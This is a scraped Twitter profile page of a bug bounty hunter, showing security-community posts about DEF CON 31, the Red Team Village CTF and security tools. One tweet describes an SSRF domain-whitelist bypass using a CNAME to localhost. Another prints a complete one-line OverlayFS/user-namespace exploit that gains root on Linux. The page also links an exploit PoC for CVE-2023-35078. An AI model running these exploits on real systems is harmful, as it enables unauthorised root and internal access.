Sysdum (@systemdumb) 's Twitter Profile
Sysdum

@systemdumb

Synack Red Team | Coder | Bug Bounty Hunter Interested in desktops, tabletops, all kinds of tops really.

ID: 1218312725350244357

calendar_today17-01-2020 23:23:18

239 Tweet

573 Takipçi

563 Takip Edilen

Sysdum (@systemdumb) 's Twitter Profile Photo

Recently found an SSRF domain white list bypass. The app was looking for vulnerable[.]com in the request. I made a CNAME on my domain pointing to localhost, allowing for internal service access. vulnerable[.]com.mydomain[.]com --> 127.0.0.1 #bugbountytip #bugbounty

pwneip (@pwneip) 's Twitter Profile Photo

Overdone meme but so real right now. You can feel the energy of 1000's of speakers, instructors, organizers, and volunteers hustling through crunch time. #DEFCON31 is going to be crazy! Hug your loved ones as you descend into the 24 hour work cycle! RedTeamVillage DEF CON

Overdone meme but so real right now. You can feel the energy of 1000's of speakers, instructors, organizers, and volunteers hustling through crunch time. #DEFCON31 is going to be crazy! Hug your loved ones as you descend into the 24 hour work cycle!
<a href="/RedTeamVillage_/">RedTeamVillage</a> <a href="/defcon/">DEF CON</a>
liad eliyahu (@liadeliyahu) 's Twitter Profile Photo

Exploit is so easy it fits in a tweet🔥 unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

Exploit is so easy it fits in a tweet🔥
unshare -rm sh -c "mkdir l u w m &amp;&amp; cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*;" &amp;&amp; u/python3 -c 'import os;os.setuid(0);os.system("id")'
RedTeamVillage (@redteamvillage_) 's Twitter Profile Photo

🔴 Red Team Village presents another exclusive interview with our amazing sponsor, @buddobot with JS0N Haddix, now available on YouTube! 🔴 📺 Watch the full interview here: youtu.be/ubVLiJ17Sd4

blueblue (@piedpiper1616) 's Twitter Profile Photo

GitHub - vchan-in/CVE-2023-35078-Exploit-POC: CVE-2023-35078 Remote Unauthenticated API Access Vulnerability Exploit POC - github.com/vchan-in/CVE-2…

Trickest (@trick3st) 's Twitter Profile Photo

We've recently added jsluice by Bishop Fox to our library, a great tool for uncovering URLs, paths, secrets and more from JavaScript with ease. Have you used it before? Reply about your experience 🗣️ github.com/BishopFox/jslu…

RedTeamVillage (@redteamvillage_) 's Twitter Profile Photo

🚨 Attention 🚨 We’re asking everyone that was at the RTV CTF today in Cesar’s Forum to CHECK their swag bags. Unfortunately, someone walked away with one belonging to one of one of our volunteers. It is vital that we locate it as it contains his ID etc. DM us if located! 🙏🏾

adragos (@adragos_) 's Twitter Profile Photo

Finished in 1st place at the Red Team CTF @ #DEFCON 31. RedTeamVillage Started off playing the event solo, but I was joined in the finals by my fellow teammates from Team Europe, Sijisu (on bsky & mastodon) and Bruno Mendes to get the win. Thank you ThreatSims and Hack The Box for the event!

Finished in 1st place at the Red Team CTF @ #DEFCON 31. <a href="/RedTeamVillage_/">RedTeamVillage</a> 

Started off playing the event solo, but I was joined in the finals by my fellow teammates from Team Europe, <a href="/sijsu/">Sijisu (on bsky & mastodon)</a> and <a href="/s3np41k1r1t0/">Bruno Mendes</a> to get the win.

Thank you ThreatSims and <a href="/hackthebox_eu/">Hack The Box</a> for the event!